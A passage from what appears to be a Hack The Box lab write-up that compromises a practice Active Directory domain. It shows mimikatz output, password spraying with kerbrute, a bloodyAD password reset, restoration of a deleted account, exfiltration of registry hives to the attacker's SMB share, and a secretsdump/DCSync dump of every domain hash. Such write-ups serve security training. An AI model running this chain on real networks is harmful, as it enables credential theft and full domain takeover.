	 * Password : a6 80 a4 af 30 e0 45 06 64 19 c6 f5 2c 07 3d 73 82 41 fa 9d 1c ff 59 1b 95 15 35 cf f5 32 0b 10 9e 65 22 0c 1c 9e 4f a8 91 c9 d1 ee 22 e9 90 c4 76 6b 3e b6 3f b3 e2 da 67 eb d1 98 30 d4 5c 0b a4 e6 e6 df 93 18 0c 0a 74 49 75 06 55 ed d7 8e b8 48 f7 57 68 9a 68 89 f3 f8 f7 f6 cf 53 e1 19 6a 52 8a 7c d1 05 a2 ec ce fb 2a 17 ae 5a eb f8 49 02 e3 26 6b bc 5d b6 e3 71 62 7b b0 82 8c 2a 36 4c b0 11 19 cf 3d 2c 70 d9 20 32 8c 81 4c ad 07 f2 b5 16 14 3d 86 d0 e8 8e f1 50 40 67 81 5e d7 0e 9c cb 86 1f 57 39 4d 94 ba 9f 77 19 8e 9d 76 ec ad f8 cd b1 af da 48 b8 1f 81 d8 4a c6 25 30 38 9c b6 4d 41 2b 78 4f 0f 73 35 51 a6 2e c0 86 2a c2 fb 26 1b 43 d7 99 90 d4 e2 bf bf 4d 7d 4e eb 90 cc d7 dc 9b 48 20 28 c2 14 3c 5a 60 10 
	 * Key List
	   aes256_hmac       9cc4c2603a3ed67348ee18025dc10cdea94e9427fc4f6e02fca57f1eb89dead7
	   aes128_hmac       e2166c1e1a5f29f378c4751039869624
	   rc4_hmac_nt       1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_old      1003ddfa0a470017188b719e1eaae709
	   rc4_md4           1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_nt_exp   1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_old_exp  1003ddfa0a470017188b719e1eaae709
 
	ssp : 
	masterkey : 
	credman : 
 
Authentication Id : 0 ; 26144 (00000000:00006620)
Session           : UndefinedLogonType from 0
User Name         : 
Domain            : 
Logon Server      : 
Logon Time        : 04/10/2023 19:30:07
SID               : 
	msv : 
	 [00000003] Primary
	 * Username : DATACENTER-2019$
	 * Domain   : FREELANCER
	 * NTLM     : 1003ddfa0a470017188b719e1eaae709
	 * SHA1     : 4ce0bf0f488248a0858d1eacbe75529994ba4999
	tspkg : KO
	wdigest : KO
	kerberos : KO
	ssp : 
	masterkey : 
	credman : 
 
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DATACENTER-2019$
Domain            : FREELANCER
Logon Server      : 
Logon Time        : 04/10/2023 19:30:07
SID               : S-1-5-18
	msv : 
	tspkg : KO
	wdigest : 
	 * Username : DATACENTER-2019$
	 * Domain   : FREELANCER
	 * Password : (null)
	kerberos : 
	 * Username : datacenter-2019$
	 * Domain   : FREELANCER.HTB
	 * Password : (null)
	 * Key List
	   aes256_hmac       6e4859faf9de3d1de33fdd2a0bb4591306b5d64f0d8ec2de342d49cf470cbc1f
	   rc4_hmac_nt       1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_old      1003ddfa0a470017188b719e1eaae709
	   rc4_md4           1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_nt_exp   1003ddfa0a470017188b719e1eaae709
	   rc4_hmac_old_exp  1003ddfa0a470017188b719e1eaae709
 
	ssp : 
	masterkey : 
	 [00000000]
	 * GUID      :	{bb43c14f-ceb3-4470-849a-af15c76aac4a}
	 * Time      :	04/10/2023 17:30:33
	 * MasterKey :	182ec41e8b2b2b36200887fe41dfc5f71b73c2b619ec79c0510056b4bf777e151f31d18a435b5d91aeaf7db6be46c278ed315b68dd6c318b5745f9c5bf9473e3
	 [00000001]
	 * GUID      :	{981d16b3-c818-4a7e-82fe-1206e42b6c72}
	 * Time      :	04/10/2023 17:32:17
	 * MasterKey :	d8201d9b1dd265a4c7f8a69a808d8755c9912c386feb6bf379e08d41cdb6d26b749dda3e31c0a538139c564263769cd4deb6c274b0b9d16d2a301a4d72d7d50c
	 [00000002]
	 * GUID      :	{57db84cf-ea9c-45a1-a6e8-d618821e181e}
	 * Time      :	04/10/2023 17:30:10
	 * MasterKey :	95e2ae7fd5c84c8e5bb19665661286fc54c6dec7ebe820ce1a74e359374f4f75f6c3275333be7ad14931a238ce64708f6160af90ba0ae2f82b4d653a6a96132e
	 [00000003]
	 * GUID      :	{1d1cfc42-9fc7-49bb-b834-9e0600d6e152}
	 * Time      :	04/10/2023 17:30:08
	 * MasterKey :	ca76b946db6b85cbe497c531122ca25d333e0e5aa7d5a6251c420d9816f2583fafac661734d33edd00e1ffb1bd273403583e82a085a78d75f29bac7bb6fc4401
	credman :

The command !mimikatz takes a bit of time but eventually produces a long list of hashes, keys and also the cleartext password v3ryS0l!dP@sswd#29.
Testing for credentials re-use on the known accounts comes up empty, but whenever I see digits at the end of a password, I think about incrementing / decrementing the number. I create a list with the numbers from 1 to 100 and combine it with the password. Then I use those combinations in a password spraying attack.

# Create password file
for i in {1..100}; do echo 'v3ryS0l!dP@sswd#'$i; done > passwords.txt
 
# Create combinations
for p in $(cat passwords.txt); do for u in $(cat users.txt); do echo "$u:$p"; done; done > combinations.txt
 
# Synchronize time
sudo timedatectl set-ntp false
sudo ntpdate -u dc.freelancer.htb
 
# Run kerbrute
./kerbrute bruteforce --domain freelancer.htb --dc dc.freelancer.htb combinations.txt
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 10/03/24 - Ronnie Flathers @ropnop
 
2024/10/03 18:30:30 >  Using KDC(s):
2024/10/03 18:30:30 >   dc.freelancer.htb:88
 
2024/10/03 18:30:36 >  [+] VALID LOGIN:  michael.williams@freelancer.htb:v3ryS0l!dP@sswd#34
2024/10/03 18:30:36 >  [+] VALID LOGIN:  sql_svc@freelancer.htb:v3ryS0l!dP@sswd#34
2024/10/03 18:30:36 >  [+] VALID LOGIN:  leon.sk@freelancer.htb:v3ryS0l!dP@sswd#34
2024/10/03 18:30:36 >  [+] VALID LOGIN:  carol.poland@freelancer.htb:v3ryS0l!dP@sswd#34
2024/10/03 18:30:37 >  [+] VALID LOGIN:  sdavis@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  d.jones@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  olivia.garcia@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  dthomas@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  taylor@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  jmartinez@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  jen.brown@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  Ethan.l@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  wwalker@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  sophia.h@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  jgreen@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  evelyn.adams@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  alex.hill@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  samuel.turner@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  hking@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  ereed@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:57 >  Done! Tested 2900 logins (20 successes) in 27.704 seconds

The password spray comes back with 20 valid combinations for a variety of different accounts. Among them several are users in the Remote Management Users group, allowing me to use WinRM for an interactive session, a few Account Operators that I can use to reset the password for accounts that do not belong to highly-privileged groups3, and some others.

Note

Getting such a high number of accounts was unexpected and probably not fully intended. I assume the intended way was to find the password for lorra199 in the memory dump through memprocfs, but instead I decided to reset the password for this account through one of the account operators.

bloodyAD -d freelancer -u evelyn.adams -p 'v3ryS0l!dP@sswd#35' --host freelancer.htb set password lorra199 'Helloworld123!'

Shell as liza.kazanof

After using WinRM to get an interactive shell on the Domain Controller with lorra199, thanks to belonging to the Remote Management Users group, I notice a unusual group membership: AD Recycle Bin. When an object is deleted within the Active Directory is not necessarily gone for good but placed into the Recycle Bin (if activated)4.

So I decide to have a peek and check if there are any deleted accounts in the bin and there’s just one deleted object - liza.kazanof. This account was also contained in the memory dump with their hash and apparently belongs to the Backup Operators group. If I can restore this account and the hash is still valid, I can use this to take over the domain.

Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
 
 
accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : freelancer.htb/Deleted Objects/Liza Kazanof
                                  DEL:ebe15df5-e265-45ec-b7fc-359877217138
CN                              : Liza Kazanof
                                  DEL:ebe15df5-e265-45ec-b7fc-359877217138
codePage                        : 0
countryCode                     : 0
Created                         : 5/14/2024 6:37:29 PM
createTimeStamp                 : 5/14/2024 6:37:29 PM
Deleted                         : True
Description                     :
DisplayName                     :
DistinguishedName               : CN=Liza Kazanof\0ADEL:ebe15df5-e265-45ec-b7fc-359877217138,CN=Deleted Objects,DC=freelancer,DC=htb
dSCorePropagationData           : {12/31/1600 7:00:00 PM}
givenName                       : Liza
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : CN=Users,DC=freelancer,DC=htb
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
mail                            : liza.kazanof@freelancer.htb
memberOf                        : {CN=Remote Management Users,CN=Builtin,DC=freelancer,DC=htb, CN=Backup Operators,CN=Builtin,DC=freelancer,DC=htb}
Modified                        : 5/14/2024 6:41:44 PM
modifyTimeStamp                 : 5/14/2024 6:41:44 PM
msDS-LastKnownRDN               : Liza Kazanof
Name                            : Liza Kazanof
                                  DEL:ebe15df5-e265-45ec-b7fc-359877217138
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : ebe15df5-e265-45ec-b7fc-359877217138
objectSid                       : S-1-5-21-3542429192-2036945976-3483670807-2101
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 133601998496583593
sAMAccountName                  : liza.kazanof
sDRightsEffective               : 0
sn                              : Kazanof
userAccountControl              : 512
userPrincipalName               : liza.kazanof@freelancer.com
uSNChanged                      : 544913
uSNCreated                      : 540822
whenChanged                     : 5/14/2024 6:41:44 PM
whenCreated                     : 5/14/2024 6:37:29 PM

Attempting to restore the object fails because of a naming conflict since there’s another object with the same name or more specific with the same distinguished name.

Get-ADObject -Filter 'samaccountname -eq "liza.kazanof"' -IncludeDeletedObjects | Restore-ADObject
An attempt was made to add an object to the directory with a name that is already in use
At line:1 char:84
+ ... untname -eq "liza.kazanof"' -IncludeDeletedObjects | Restore-ADObject
+                                                          ~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (CN=Liza Kazanof...eelancer,DC=htb:ADObject) [Restore-ADObject], ADException
    + FullyQualifiedErrorId : 0,Microsoft.ActiveDirectory.Management.Commands.RestoreADObject

Both objects can’t coexist, so I need to provide a new name for the restored object by passing a value via -NewName to Restore-ADObject5. I’ll use Liza and the object is restored succesfully. Then trying to use the hash to connect to the machine via nxc fails due to an expired password and I have to reset it.

nxc smb freelancer.htb -u 'liza.kazanof' -H '6bc05d2a5ebf34f5b563ff233199dc5a'
SMB         10.129.229.97   445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB         10.129.229.97   445    DC               [-] freelancer.htb\liza.kazanof:6bc05d2a5ebf34f5b563ff233199dc5a STATUS_PASSWORD_EXPIRED
 
impacket-smbpasswd -hashes :6bc05d2a5ebf34f5b563ff233199dc5a 'freelancer.htb/liza.kazanof@freelancer.htb'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================
 
New SMB password: 
Retype new SMB password: 
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.

With smbpasswd I set a new password for the account and can then login with Helloworld123!.

evil-winrm -u 'liza.kazanof' -p 'Helloworld123!' -i freelancer.htb

Shell as Administrator

As already noted, the user liza.kazanof is in the Backup Operators group and can therefore be used to dump backup the registry hives (even from remote). With the help of reg.py from impacket I backup the SAM, SYSTEM and SECURITY hive onto my SMB share.

impacket-reg freelancer/liza.kazanof:'Helloworld123!'@dc.freelancer.htb \
             backup \
             -o \\\\10.10.10.10\\share
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\10.10.10.10\share\SAM.save
[*] Saved HKLM\SYSTEM to \\10.10.10.10\share\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.10.10.10\share\SECURITY.save

Then I can proceed to dump the hashes via secretsdump and use the administrator’s hash to get an interactive shell and collect the final flag.

impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save local
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Target system bootKey: 0x9db1404806f026092ec95ba23ead445b
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:680c12d4ef693a3ae0fcd442c3b5874a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:1f36a3b5a23441f6054f56f97d29c3312ca75d6d7450912ea81648778b5e540c6f38ab1335f9b27f4c69646359f12f2358d272bc0de36d5a9073b2358f68f1873425130a4b88bd750a55f018f1a83d1108691f4757b92f3f1242147e656fe2e1c38e312d5f26f6d9377cb01a53c38d689a48f4c1fcb5320d06fd6c3184810ba49ec8197a0b14f8e9a06f7a83e68437412e57cfa5bc2aa78a782412c509c139cf2cd85efea4b1ea5cafbb1146bc3eb5431eda9feae2854e25c4d1f357d6dc2844c2b7b86325bdca5985873644bd0b3de57996d8e442cd5996e2206072b8e7e90c621bd4f4f67f52be774a578c2d515d31
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:89851d57d9c8cc8addb66c59b83a4379
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe20295f92e7e0bff2615bed48f0a0be7067e28f2
dpapi_userkey:0xbc3e1b600d881e1867b0bdfe6ec833e9743c07d7
[*] NL$KM 
 0000   D9 0B 60 A4 72 C3 B6 08  E4 F1 FF 54 62 91 65 66   ..`.r......Tb.ef
 0010   DE EE 19 17 58 31 12 CB  DF 25 18 D0 36 B0 C1 F4   ....X1...%..6...
 0020   1B 96 C3 5F 22 73 F0 D6  B9 81 2F 26 BA 69 6A FD   ..._"s..../&.ij.
 0030   7F C7 0B 87 71 BE D5 F5  8A 74 B4 3A BD AF DB 71   ....q....t.:...q
NL$KM:d90b60a472c3b608e4f1ff5462916566deee1917583112cbdf2518d036b0c1f41b96c35f2273f0d6b9812f26ba696afd7fc70b8771bed5f58a74b43abdafdb71
[*] _SC_MSSQL$SQLEXPRESS 
(Unknown User):v3ryS0l!dP@sswd#34
[*] Cleaning up...

With the hash of the machine account DC$ I can also dump the rest of the hashes in the domain, because the machine account on a Domain Controller can use DCSync by default.

 impacket-secretsdump -hashes :89851d57d9c8cc8addb66c59b83a4379 'FREELANCER.HTB/DC$@dc.freelancer.htb'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d238e0bfa17d575038efc070187a91c2:::
freelancer.htb\mikasaAckerman:1105:aad3b435b51404eeaad3b435b51404ee:e8d62c7d57e5d74267ab6feb2f662674:::
sshd:1108:aad3b435b51404eeaad3b435b51404ee:c1e83616271e8e17d69391bdcd335ab4:::
SQLBackupOperator:1112:aad3b435b51404eeaad3b435b51404ee:c4b746db703d1af5575b5c3d69f57bab:::
sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
lorra199:1116:aad3b435b51404eeaad3b435b51404ee:c068bcc3c0dcd03cd84df5af2192ad8a:::
freelancer.htb\maya.artmes:1124:aad3b435b51404eeaad3b435b51404ee:22db50a324b9a34ea898a290c1284e25:::
freelancer.htb\michael.williams:1126:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
freelancer.htb\sdavis:1127:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\d.jones:1128:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\jen.brown:1129:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\taylor:1130:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\jmartinez:1131:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\olivia.garcia:1133:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\dthomas:1134:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\sophia.h:1135:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\Ethan.l:1138:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\wwalker:1141:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\jgreen:1142:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\evelyn.adams:1143:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\hking:1144:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\alex.hill:1145:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\samuel.turner:1146:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\ereed:1149:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
freelancer.htb\leon.sk:1151:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
freelancer.htb\carol.poland:1160:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
freelancer.htb\lkazanof:1162:aad3b435b51404eeaad3b435b51404ee:a26c33c2878b23df8b2da3d10e430a0f:::
freelancer.com\liza.kazanof:2101:aad3b435b51404eeaad3b435b51404ee:c068bcc3c0dcd03cd84df5af2192ad8a:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:89851d57d9c8cc8addb66c59b83a4379:::
DATACENTER-2019$:1115:aad3b435b51404eeaad3b435b51404ee:7a8b0efef4571ec55cc0b9f8cb73fdcf:::
DATAC2-2022$:1155:aad3b435b51404eeaad3b435b51404ee:007a710c0581c63104dad1e477c794e8:::
WS1-WIIN10$:1156:aad3b435b51404eeaad3b435b51404ee:57e57c6a3f0f8fff74e8ab524871616b:::
WS2-WIN11$:1157:aad3b435b51404eeaad3b435b51404ee:bf5267ee6236c86a3596f72f2ddef2da:::
WS3-WIN11$:1158:aad3b435b51404eeaad3b435b51404ee:732c190482eea7b5e6777d898e352225:::
DC2$:1159:aad3b435b51404eeaad3b435b51404ee:e1018953ffa39b3818212aba3f736c0f:::
SETUPMACHINE$:8601:aad3b435b51404eeaad3b435b51404ee:f5912663ecf2c8cbda2a4218127d11fe:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:1743fa93ed1f2f505d3c7cd6ef1e8c40589f107070065e98efc89ea907d81601
Administrator:aes128-cts-hmac-sha1-96:bd23b1924f1fd0bdc60abf464114a867
Administrator:des-cbc-md5:0d400dfe572a3262
krbtgt:aes256-cts-hmac-sha1-96:4e33b02ee45738a0db98c0747d8d41b7205f4f583c8f0591e20d67178b20511d
krbtgt:aes128-cts-hmac-sha1-96:adcc7fdd6f19591bbefa232ed8694c43
krbtgt:des-cbc-md5:04d3cd1cbaea5262
freelancer.htb\mikasaAckerman:aes256-cts-hmac-sha1-96:6164b1e12f315d3a6e9f7fc602e1e27ff14f74f344d6cd0ed6cb748ec5650c69
freelancer.htb\mikasaAckerman:aes128-cts-hmac-sha1-96:a756aa73641bd3773edfa97cb6bf54ed
freelancer.htb\mikasaAckerman:des-cbc-md5:ab1ce53d6eb5b62a
sshd:aes256-cts-hmac-sha1-96:a8782de0299ca5fe9658b4813aa47b80097f54c76e1311e160947bdb0b366660
sshd:aes128-cts-hmac-sha1-96:f00346995373fef1641c6e5b90b74424
sshd:des-cbc-md5:01a2976764688a73
SQLBackupOperator:aes256-cts-hmac-sha1-96:054901226a3869da55b25ed0c8c1d9fba0130f7bec9441f51e6d58e5aa645d74
SQLBackupOperator:aes128-cts-hmac-sha1-96:c7e1a5cb1ae6fe0cb333075ccceb7215
SQLBackupOperator:des-cbc-md5:549eda3480ceab92
sql_svc:aes256-cts-hmac-sha1-96:91c836ba7777d253101c7052c78016ba11b25696fe1e0afbabcc2745c8c23dd5
sql_svc:aes128-cts-hmac-sha1-96:c08735502e4220b00a8555282f207bb8
sql_svc:des-cbc-md5:aea8fddc4a2a0162
lorra199:aes256-cts-hmac-sha1-96:f07ae4cd6edd6786b4fb354e7b9c7b2398a3580d816e5300b91875c2967ab4fd
lorra199:aes128-cts-hmac-sha1-96:7d45d053a753fadf5cde44228f1bd749
lorra199:des-cbc-md5:6e5b80268397baec
freelancer.htb\maya.artmes:aes256-cts-hmac-sha1-96:87dbbb7747315d238fbc8cf2b491fb2440ec5df911fef4c960d5f6a3d8880417
freelancer.htb\maya.artmes:aes128-cts-hmac-sha1-96:b471a81c44f36cbae619f40716c7c8bd
freelancer.htb\maya.artmes:des-cbc-md5:011623c2e0ce4c1a
freelancer.htb\michael.williams:aes256-cts-hmac-sha1-96:6d6c00a78f43971ce12cced2a0e9eba91b1e17deb2826b55263bff1d87b439fc
freelancer.htb\michael.williams:aes128-cts-hmac-sha1-96:74042a3a68bc861289f672e0d27fe6b6
freelancer.htb\michael.williams:des-cbc-md5:83837cc7617f52a4
freelancer.htb\sdavis:aes256-cts-hmac-sha1-96:be5c22288453e08f76be3f11d7e4c9cda128be135537895aa8d68fb01c1be9e0
freelancer.htb\sdavis:aes128-cts-hmac-sha1-96:d05709ee072d825c3f323be21475a7ea
freelancer.htb\sdavis:des-cbc-md5:bccb52aedf98fb1f
freelancer.htb\d.jones:aes256-cts-hmac-sha1-96:bab008e4e24beafd524f0081cf15b0eafea3585f963fa6947f701eb6f820ca33
freelancer.htb\d.jones:aes128-cts-hmac-sha1-96:0ebb687442c5c2c515ad00205fab2a6f
freelancer.htb\d.jones:des-cbc-md5:1cd3da20bae3c198
freelancer.htb\jen.brown:aes256-cts-hmac-sha1-96:0298d308060494d06232656f455829ab27f24789520d1cc66f89ee97d3174d0d
freelancer.htb\jen.brown:aes128-cts-hmac-sha1-96:1894401fd91b66ff2d6d63fcfe662313
freelancer.htb\jen.brown:des-cbc-md5:342ce9a42ace8092
freelancer.htb\taylor:aes256-cts-hmac-sha1-96:cbf730581c4cbb76462a9b0e5517da7b70e13d5103cc68e3483b2c093f0b5d7c
freelancer.htb\taylor:aes128-cts-hmac-sha1-96:d444dcd43270907c762b4869dc47bd47
freelancer.htb\taylor:des-cbc-md5:1f6edf615725c80e
freelancer.htb\jmartinez:aes256-cts-hmac-sha1-96:83ec85539004c5aa3fb840eab3249a2700fb5cee564e6b0b40c0009670744660
freelancer.htb\jmartinez:aes128-cts-hmac-sha1-96:89b817a7ed0f6e7ac6e41df723cdb1c2
freelancer.htb\jmartinez:des-cbc-md5:6bfde3ea0d04c1b0
freelancer.htb\olivia.garcia:aes256-cts-hmac-sha1-96:3ca56134c8c738873fdcb19fafea3c8b39d5eaaab005a4e1b24a9bcdec0761d0
freelancer.htb\olivia.garcia:aes128-cts-hmac-sha1-96:e31085216515ef081b92cc4ab827765c
freelancer.htb\olivia.garcia:des-cbc-md5:3bdaa40d31b345f4
freelancer.htb\dthomas:aes256-cts-hmac-sha1-96:6a73a933a0b4007798a65127b8917922bb3e1b2d5d3acc1dfd904cb86bf05842
freelancer.htb\dthomas:aes128-cts-hmac-sha1-96:d527381366a92d8ceb759f9aa21326e8
freelancer.htb\dthomas:des-cbc-md5:abbffb891f153883
freelancer.htb\sophia.h:aes256-cts-hmac-sha1-96:77d45db16e39bd96386975610299c7f2c675ec32d8a92cd340357b7656b9e78b
freelancer.htb\sophia.h:aes128-cts-hmac-sha1-96:7ad896f3839a23370dc2158d15ed23bb
freelancer.htb\sophia.h:des-cbc-md5:7c1cb0d654517a57
freelancer.htb\Ethan.l:aes256-cts-hmac-sha1-96:4a19d9711f7e182d14bde755de201c3b387ec800e5d8a4b65c304c702cd931ac
freelancer.htb\Ethan.l:aes128-cts-hmac-sha1-96:5d281646333e0f988591f4d9f5839acf
freelancer.htb\Ethan.l:des-cbc-md5:451abc9b4cc1cb61
freelancer.htb\wwalker:aes256-cts-hmac-sha1-96:9566d111248ca62a7fd615ec0ecf17110cb5ce8d4db6ae70f155003d843e35ee
freelancer.htb\wwalker:aes128-cts-hmac-sha1-96:cd5ff86e6729e674745be70c08b0699f
freelancer.htb\wwalker:des-cbc-md5:c131709d8f7f61a8
freelancer.htb\jgreen:aes256-cts-hmac-sha1-96:b6f58646adf12516edf197ce30dcda3e4c0966f2868183a2c02bba7e2241b162
freelancer.htb\jgreen:aes128-cts-hmac-sha1-96:2b321949c61ad2e75918e2bf7efd4724
freelancer.htb\jgreen:des-cbc-md5:405b6208ecc82057
freelancer.htb\evelyn.adams:aes256-cts-hmac-sha1-96:96a7f8556b8a2fad3f13184735b5e4657a6baf98b0f28036ab546562917eff36
freelancer.htb\evelyn.adams:aes128-cts-hmac-sha1-96:ed59b48e2d08731cc6ee7ebd791ab415
freelancer.htb\evelyn.adams:des-cbc-md5:526bda25ef3204f7
freelancer.htb\hking:aes256-cts-hmac-sha1-96:877b3ae2722aced00d78b66a0aad4ddbcc37fd8c1179d1d43a7478569a655771
freelancer.htb\hking:aes128-cts-hmac-sha1-96:2030e3efff50f998a9616aef40ea3578
freelancer.htb\hking:des-cbc-md5:869238df6868d913
freelancer.htb\alex.hill:aes256-cts-hmac-sha1-96:eeed403dc3fe63e53c6b6230f9a8980a21ee3b85e70a428d136e1632503e0d60
freelancer.htb\alex.hill:aes128-cts-hmac-sha1-96:1cc28dac35933ca7c1f5aadf7ba27a26
freelancer.htb\alex.hill:des-cbc-md5:e9abe0493eda04fb
freelancer.htb\samuel.turner:aes256-cts-hmac-sha1-96:6a1f51c13337648de96112140c42cd64e2d13a0dc74c52f668f788ad90163df2
freelancer.htb\samuel.turner:aes128-cts-hmac-sha1-96:8c8efb5dbdc3498008a039a5259c770d
freelancer.htb\samuel.turner:des-cbc-md5:341f804a94e0fde3
freelancer.htb\ereed:aes256-cts-hmac-sha1-96:db3028570853a4578221624c3eb479a3e394f51d8ec60382bda68f9f80e85529
freelancer.htb\ereed:aes128-cts-hmac-sha1-96:4974b1cbb5220fa123a5bd41aabb7bca
freelancer.htb\ereed:des-cbc-md5:cbbc0efdc8c1df45
freelancer.htb\leon.sk:aes256-cts-hmac-sha1-96:4deaf484fd929e838817743617af0853e39e4343d6c0955b1939fe4468fd7264
freelancer.htb\leon.sk:aes128-cts-hmac-sha1-96:2e026c6c4a8b2efc2211416adde3b9c7
freelancer.htb\leon.sk:des-cbc-md5:31c71a9438a1da38
freelancer.htb\carol.poland:aes256-cts-hmac-sha1-96:a230f87fafce155b3b02cabbba74c83e7b8ddb4f74a4e6605a06bc980267289b
freelancer.htb\carol.poland:aes128-cts-hmac-sha1-96:1b383dd738a8768c465e48c46e0dfcbb
freelancer.htb\carol.poland:des-cbc-md5:041652e5cd97ea6e
freelancer.htb\lkazanof:aes256-cts-hmac-sha1-96:4ba98049d411ea7293b5924a25c10ae2a3c18f045aa22fb7c828d888820fd719
freelancer.htb\lkazanof:aes128-cts-hmac-sha1-96:b8fd8c1c1d3dde5c21cf3f482989a718
freelancer.htb\lkazanof:des-cbc-md5:57f2d5b515020d70
